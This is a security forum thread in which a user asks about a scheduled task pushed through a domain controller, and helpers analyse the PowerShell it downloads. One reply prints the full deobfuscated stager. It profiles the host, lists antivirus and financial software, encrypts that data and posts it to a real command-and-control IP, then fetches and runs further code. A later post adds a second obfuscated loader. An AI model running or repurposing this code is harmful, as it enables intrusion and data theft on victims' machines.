A Memory Resident Virus ?

Ask your beginner questions here.

A Memory Resident Virus ?

Postby 4everyone » Sun Jan 14, 2018 7:46 am

Happy New Year Folks !

I'm going through a situation where a Scheduled task is getting deployed through the Domain Controller to the workstation. And Task is running a wscript+powershell using a download link which is displayed in the scheduled task script.

Link is - http://192.96.206.191:9097/static/ka7ds ... AHSGA656gh

The above link has some coding. Not sure what its capable of or what actually this script does. Can someone let me know whats the purpose of the above script ? Appreciate your help in advance.

Thanks
4Everyone
4everyone
 
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am
Reputation point: 5

Re: A Memory Resident Virus ?

Postby xors » Sun Jan 14, 2018 12:00 pm

Can you add as an attachment the script here?:)
@xorsthings
User avatar
xors
 
Posts: 138
Joined: Mon May 23, 2016 2:01 am
Location: Greece
Reputation point: 63

Re: A Memory Resident Virus ?

Postby 4everyone » Sun Jan 14, 2018 4:33 pm

Thanks for your reply. Here you Go.
You do not have the required permissions to view the files attached to this post.
4everyone
 
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am
Reputation point: 5

Re: A Memory Resident Virus ?

Postby N3mes1s » Mon Jan 15, 2018 5:18 pm

Hello.
This is pretty interesting, seems to be a recon script(i dunno know if it's a know one and don't have time to check) in powershell. After multiple layer obfuscated with Invoke-Obfuscation and various download from the same ip, this is the code.

It is self explanatory at this stage just read the functions name :)

Code: Select all
function GsdsetWweter {
    $Serv = $args[0]
    $SK = $args[1]
    $USAG = $args[2]
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
    $ErrorActionPreference = "SilentlyContinue";
    $e=[System.Text.Encoding]::ASCII;
    function Get-SysID($HashName = "MD5"){
        [string]$ret = ""
        $hd = gwmi win32_bios
        $ret = $hd["SerialNumber"].ToString()
        [string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
        $StringBuilder = New-Object System.Text.StringBuilder
        [System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{
            [Void]$StringBuilder.Append($_.ToString("x2"))
            }
            $e = $StringBuilder.ToString().ToLower()
            $e
        }
  Function HasGet-Bretring($ht) {
  $first = $true
  foreach($pair in $ht.GetEnumerator()) {
    if ($first)
    {
       $first = $false
    }
    else
    {
       $output += ';'
    }
    $output+="{0}" -f $($pair.Value)
   }
   $output
  }

 function Get-workconfig {
  Get-WmiObject Win32_NetworkAdapter -Filter 'NetConnectionStatus=2' |
    ForEach-Object {
      $result = 1 | Select-Object Name, IP, MAC, ID
      $result.Name = $_.Name
      $result.MAC = $_.MacAddress
      $result.ID = $_.DeviceID
      $config = $_.GetRelated('Win32_NetworkAdapterConfiguration')
      $result.IP = $config | Select-Object -expand IPAddress
      $result
    }
 
}
   
    function Get-Sysinfo {     
        $str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName;
        $string = ""
        foreach($c in Get-workconfig){
            [string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
            $ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
            [string]$ip = $c.IP[0]; if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
            $lanconf = @{
            id = $ID
            ip = $ip;
            mac =  $macadr;
            name = $lanname;
            }
           $string += HasGet-Bretring $lanconf
           $string += "!"
        }

        $o = (Get-WmiObject Win32_OperatingSystem)       
        $str += "|$string";
        $str += '|' +$o.Name.split('|')[0];
        if(([Environment]::UserName).ToLower() -eq "system"){
            $str += '|True'
        }
        else{
            $str += '|'+ ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
        }
        [void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
        $Screens = [system.windows.forms.screen]::AllScreens
        foreach ($Screen in $Screens) {                       
            $Width  = $Screen.Bounds.Width           
            $Height  = $Screen.Bounds.Height
        }
        $str += '|' + "$Width`x$Height"
        $n = [System.Diagnostics.Process]::GetCurrentProcess()
        $str += '|'+$n.ProcessName+'|'+$n.Id
        $str += '|' + $PSVersionTable.PSVersion.Major
        $str += '|' + $ENV:PROCESSOR_ARCHITECTURE
        $str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption
        $str += '|' + $o.ConvertToDateTime($o.LastBootUpTime)
        $str
    }
   
function getlisturi{
    $RandName = -join("abcdefghijklmoprstvuxyz".ToCharArray()|Get-Random -Count $args[0]);$ar = @('php','jsp','asp') | Get-Random;
    $RandName + '.' + $ar
    }

    function Get-Soft {
    param (
        [Parameter(ValueFromPipeline=$true)]
        [string[]]$ComputerName = $env:COMPUTERNAME,
        [string]$NameRegex = '(Opera|Firefox|Chrome|TAX|Lacerte|OLT|ProSeries|Ultratax|Drake|Taxslayer|ProTaxPro|Taxwise|Avast|ESET|Malwarebytes|McAfee|Norton|Panda|Sophos|Webroot|Bitdefender|Symantec|Trust|EICAR|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|quickbooks|keypass|ftp|ssh|Outlook)'
    )
    foreach ($comp in $ComputerName) {
        $keys = '','\Wow6432Node'
        foreach ($key in $keys) {
            try {
                $apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
            } catch {
                continue
            }
            foreach ($app in $apps) {
                $program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
                $name = $program.GetValue('DisplayName')
                $str = ''
                if ($name -and $name -match $NameRegex) {
                    $str += $name + ';'
                    $str
                }
            }
        }
    }
}
            try {
                $FirstAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;         }
            catch {
                $FirstAES=New-Object System.Security.Cryptography.RijndaelManaged;
            }
    $FirstIV = [byte] 0..255 | Get-Random -count 16;$FirstAES.Mode="CBC";
    $FirstAES.Key=$e.GetBytes($SK);
    $FirstAES.IV = $FirstIV;
    $csp = New-Object System.Security.Cryptography.CspParameters;
    $csp.Flags = $csp.Flags -bor [System.Security.Cryptography.CspProviderFlags]::UseMachineKeyStore;
    $rs = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 2048,$csp;
    $rk=$rs.ToXmlString($False);$ib=$e.getbytes($rk);
    $eb=$FirstIV+$FirstAES.CreateEncryptor().TransformFinalBlock($ib,0,$ib.Length);
    $BotIDXor= Get-SysID;
    $EncodedText =[Convert]::ToBase64String($e.getbytes($BotIDXor));
    $EncodedText2 =[Convert]::ToBase64String($e.getbytes($EncodedText));
  if(-not $wc){
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
        $wc=new-object system.net.WebClient;
        $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
        $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
    }
    $wc.Headers.Add("User-Agent",$USAG);
    $wc.Headers.Add("Cookie","SESSIONID:$EncodedText2");
    $raw=$wc.UploadData($Serv + "/" + $(getlisturi 9),"POST",$eb);
    write-host "STAGER GET raw   "  $raw
    $de=$e.GetString($rs.decrypt($raw,$false));
    $key=$de[0..($de.length-2)] -join '';
    $k=$de[$de.length-1] -join '';
  if ($k -eq 0) {
    $str1 =  Get-Sysinfo;
    $str2 =  Get-Soft;
    $str = $str1 + '|' + $str2
    }
  else{$str = 'OK'+ '|' + ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") + '|' + ([System.Diagnostics.Process]::GetCurrentProcess()).id}
    $SecondAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
    $SecondIV = [byte] 0..255 | Get-Random -count 16;
    $SecondAES.Mode="CBC"; $SecondAES.Key=$e.GetBytes($key); $SecondAES.IV = $SecondIV;
    $ib2=$e.getbytes($str);
    $eb2=$SecondIV+$SecondAES.CreateEncryptor().TransformFinalBlock($ib2,0,$ib2.Length);
    $wc.Headers.Add("User-Agent",$USAG);
    $raw=$wc.UploadData($Serv+ "/" + $(getlisturi 13),"POST",$eb2);
try {$AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;}
catch {$AES=New-Object System.Security.Cryptography.RijndaelManaged;}
    $AES.Mode="CBC";
    $IV = $raw[0..15];$AES.Key=$e.GetBytes($key);$AES.IV = $IV;
    $shelles = [System.Text.Encoding]::ASCII.GetString($($AES.CreateDecryptor().TransformFinalBlock($raw[16..$raw.Length],0,$raw.Length-16)))
    iex $shelles
    $FirstAES=$null;$BotIDXor=$null;$rs=$null;$eb2=$null;$raw=$null;$IV=$null;$str=$null;$ib2=$null;$SecondAES=$null;$AES=$null; $SecondIV=$null;$shelles= $null;
    $Error.Clear()
    [GC]::Collect()
    [GC]::WaitForPendingFinalizers()
    federerfegegfeg $key "SESSIONID:$EncodedText2" $Serv '/sale/getinfo.php,/getnews.asp,/update/news.html,/defender/main.jsp,/mains.asp|Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0' $([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") $PSVersionTable.PSVersion.Major
    }
  GsdsetWweter 'https://192.96.206.191' ':nP&2[Ia+4E7)V~z.M5pvdrsXle$]!U(' 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0'


https://ghostbin.com/paste/83av7
N3mes1s
 
Posts: 42
Joined: Wed Mar 09, 2011 5:17 pm
Reputation point: 5

Re: A Memory Resident Virus ?

Postby 4everyone » Mon Jan 15, 2018 7:48 pm

Thanks for your time looking in to this N3mes1s.

Regards,
4Everyone
4everyone
 
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am
Reputation point: 5

Re: A Memory Resident Virus ?

Postby 4everyone » Fri Jan 19, 2018 6:04 pm

Hi N3mes1s,

I found another Obfuscated code running through the GP. can you please decode this for me , so that i will be able to get what it does ?

Code: Select all
. ( $VERbosePREFeREnCe.tosTrINg()[1,3]+'X'-JOiN'') ( ( '146P165h156z143}164<151z157b156;40j107P145}164}55<116;145<167<55<120b162h157L143z173g15}12b160L141b162g141g155P40P50P133L163g164;162h151z156z147;135g44}144j141;164g141P51j15b12b44P120j157P167z145<162g163<150b145g154<154j105<170;145}40g75}40}47}160z157<167b145h162}163P150g145;154j154g56<145}170P145<47L73<40g15b12z164;162h171<40P173;44<160b163}151L40L75z40z116;145<167j55h117j142j152P145L143L164}40b123<171b163z164;145}155h56<104z151b141L147L156j157h163j164h151b143L163z56}120L162z157}143P145j163;163j123z164g141<162b164;111}156P146}157<73;44h160}162z157j143j75;156z145;167;55h157g142<152z145L143<164<40b123}171<163h164;145g155j56P104P151P141j147}156P157;163L164g151P143<163z56}120g162g157}143j145<163b163P73<44h160j163b151h56L103j162j145z141;164h145}116}157g127<151;156L144h157j167<40<75}40;44;164P162b165;145L73}44;160;163g151h56;127h151h156;144z157g167}123j164P171}154z145g40L75b40g47P110}151P144L144L145;156b47z73<44<160P162z157j143g56<123L164;141;162;164z111j156j146;157}40P75g40j44P160z163;151j73b44h160P162P157L143P56;123b164P141}162}164;111<156<146}157L56b106b151j154;145<116j141g155<145z40g75g40L44j120}157b167L145P162;163z150<145b154P154h105b170b145b73h44g160j162}157g143h56h123<164j141j162h164j111h156P146b157}56j101z162b147g165;155}145}156h164<163}40;75P40z47;55;156b157h145P170L151j164g40<47<40}40j40}53z40j47}55b156j157L154<157h147j157<40h47h53j47j55L156L157b160j162j157;146}151z154z145P40P47;53z47z55z116g157;156h111b156b164P145;162}141;143h164<151;166}145g40}47;53P40<47j55<105b156<143L157P144h145L144h103b157j155<155L141g156L144<40L47z53h40g44g144;141j164g141g73j44h160;162b157}143b56g163b164g141P162h164<50g51b174b40<117g165j164g55L116h165<154h154g40P73;175}15g12z143z141z164g143h150g40j173b40}44}137j56j105<170b143b145P160;164j151;157<156j56b115;145j163g163g141;147;145z73P175P15b12L146L151b156h141L154j154z171<173j44<144}141h164h141<40g75g40h44j156P165}154z154P73b133P107P103<135z72<72b103<157<154}154}145b143g164h50L51b73<133L107j103;135z72b72b127;141}151L164<106z157b162j120b145L156h144;151g156L147h106<151g156;141j154j151b172j145b162g163h50;51;73}175P175<15;12P107;145b164j55L116j145g167b55P120<162b157h143b40<55}144<141z164L141h40b47h141h121z102z154P101j110h147L101b111;101j101<153b101P103P147g101<127z167j102j123<101b107b125<101<122j147h102j144h101L103z64L101j121<121L102<124<101g106b115z101b132}121L102b164;101h107h111b101;124<101b102b65}101h103;64b101<122;167}102h154<101j106b121g101P126b101b102;132g101P106g101b101g122L121g101}157P101<103z143z101b125;167b102j65<101z110h115b101;144;101}102j154g101P107j60h101j114g147b102;116g101b107}105z101j142}147<102P150j101}107b143h101z132z121}102g164L101}107;125j101j142b147P102P60<101;103}64<101g121;121h102j61}101j110b121L101g142z167L102}164P101z107h105}101b144z101}102g160h101<107j70j101;142z147L101j165L101j105P105b101g142<121h102}172g101b107b153h101z126P121b102}60}101<107}153<101h142z101b102b172b101;103<143P101z113<121b102P70L101b104z70j101<145P167L101<153j101L106P70;101j146L121P102b70<101j103<125j101P145g167L101L153j101j106P70<101g114g147L102h110}101}105P125;101}144}101<102g107j101;107}153h101b132<121j102L163P101g105L121L101<113j101j101L156L101g107L105g101b142z121P102L172j101b107L153j101h123g121<102b165<101j107<153h101h144<101z102;107h101j107<105L101<141b121L102<163g101;107}125;101}132z101P101b156z101P103;167<101}112<167P102L117b101<107z70;101;142P147L102}121P101z110b125L101L131<147j102;163P101b107h153b101b131b167L101P163<101z106L115L101;144g101;102j150b101j110j121z101h141g121P102b152}101}103g143b101b113h121L101}165<101<106<115}101<122<121L102}125<101;106;131z101z121h121P102b115;101h106P125b101z122P121;101L157}101P103h121;101j124h147j102;126P101h105g167g101}142<101b101g163P101<103}121;101j126}101L102z123;101}110;125h101b122b121L101;160b101;110z60h101h117z167b102<142g101P106z115g101P145g121<102g172h101L110<121P101j132h121;102P164b101g103b64P101}124P147L102L154<101}110L121}101j114<147b102<124z101g107;125P101L143g147z102;62<101j107}153L101<131P167j102b154h101z106b101;101z142b167g102z160j101b107b64;101P144z101b102z116b101L107;105b101L142<147z102j150b101P107P143<101;132h121b102P171<101g106<60}101j117P147}101h66L101}106;115L101L132b121P102P171g101P110z131b101z132j121L102}171}101z105h115P101b132z121z102;171P101h110<121z101b141L121h102P155;101h107j153b101z131;167z102b150g101h110;121b101;132z121L102;127g101L107;105}101g142j101g102z160<101g107b121L101L131P121L102j60j101;107z153b101h142g167;102P165j101;105j115<101b131L121<102<163h101j107}167g101b131j147b102z150}101L107j115P101L141P167b101}71j101P110g163b101L112<101b102}60L101}110z111;101}144;121}102<154h101L110P60h101h117b167z102j142;101z106;115;101;145b121b102L172z101L106}121h101j122L121g102P164<101;103<64h101;124;147;102L154;101z110L121P101z114z147}102g124;101<107P125h101L125L147h102<62<101P105P153g101;121j167h102;154}101j106}101g101;142g167;102}112h101z107P64b101<144}101z102z116}101}105}105h101}142h147L102z150g101}105<143h101z122j121j102h171P101j106j60P101b117h147h101;66P101}105<125P101g145z101L102j167;101}107b125}101g131}167L102<60j101}104}105<101h115j101g101g167z101z105h115z101}142z167z102;165h101g106h121}101}123j121j102z117b101b110g125P101j122z121P101<71<101j104<101j101b117;167b101P147}101<103g147}101P124j147<102h154;101}110;143g101L114h121h102z120L101<107}111h101g141L147j102z154}101b107L115<101j144z101g101;147}101j106P115b101z145L121z102L172b101g110<121<101P132g121}102}164P101b103<64j101L124;147z102;154z101j110;121}101L114}147z102;130g101L107P125;101}131g147P102;104L101L107;167h101b141}121b102g154;101b107P64L101}144L101b101L160b101j103j64}101}122;101h102z166}101<110b143h101}124<147b102j115<101<105L70}101P131;121z102P153j101}106<115<101L144P101j102;123z101P105z153L101h124;147g102z110b101h103h147L101z112g167z102;157b101j110b121j101g144L101L102L167L101L110L115b101g117L147h101z166L101z103z70b101;115<121h101}65P101j104z111}101}114}147h101z65g101L104z131}101b114g147<101b171;101z104}101j101h116j147h101P165z101z104z105}101z117j121P101j170z101;103P70P101<112g167;101g162;101z103;101}101z112}101L101b157P101<103b60P101P141L147g102}166z101L107;153h101;142g147g101g157P101;103}143z101b121}121j102L103;101;105j115P101}122h101P102b106L101L105h131b101P122h167g102g111j101b105j163}101g124P101P102j116P101b105b64<101z142<147L102<166g101P110;101h101j143;121b102j171g101b110}115h101h144L101g102<62}101;110h125P101j144b167z102<64g101b110P153z101j145b147<101j156z101;103g64g101<126P101<102}166j101;105b115g101g141P101g102b150j101z110P111b101<121;121}102L171;101L110P111;101j131h121z102j65<101h103z147j101P113;121h102<70g101b105g143h101h132z121h102<60P101z103j60}101z125g147g102P150j101z107h64L101g132z101g102L166b101P107P60L101L111j101;101}164g101;105;115L101<142;167h102z61z101}107;64;101}144b101;101<147g101z104z147P101j113;121h101}160L101}103<163;101;112g167h101L165P101L103}143}101j113b167b101j147g101<103<121j101z113;101h102g101z101;103g147<101P112h167b102b167L101;107;147j101}143h101L101<156j101P103g167b101g112<167<102<161b101P110P115j101h143L101g101L156P101<103<167L101}112j167L102L150P101L110h115z101;143z101<101z156}101L103b153h101;111j101z102}70P101;103<101P101b122j167b102<154g101g110<121b101j114h121}102;123P101g107L105;101g142L147<102<153<101j107P70}101P142g121z101h160z101;103g153P101}113g121g101z75<47<15g12L163}164P141z162L164<55L163}154h145b145b160<40;55g163h40P65}15}12g145j170P151b164'-SPLiT ';'-SplIt'}' -sPlit'z' -Split 'b'-SPLiT 'P' -SPlit 'j'-SpliT '<' -sPLiT'L' -SpLiT'g' -SPlIT 'h'|FoREaCH{ ( [ConVERt]::tOINT16(( [STrInG]$_ ) ,8 ) -aS [CHar])} ) -jOiN'' )
4everyone
 
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am
Reputation point: 5

Re: A Memory Resident Virus ?

Postby 4everyone » Fri Jan 19, 2018 10:57 pm

Dont worry about it. I got it figured out. Cheers !
4everyone
 
Posts: 28
Joined: Fri Jul 16, 2010 1:59 am
Reputation point: 5


Return to Newbie Questions

Who is online

Users browsing this forum: No registered users and 5 guests